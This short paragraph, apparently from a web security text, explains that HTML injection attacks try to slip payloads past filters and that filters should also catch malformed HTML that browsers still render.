HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, but not so myopic that they miss “improper” HTML constructs that a browser will happily render.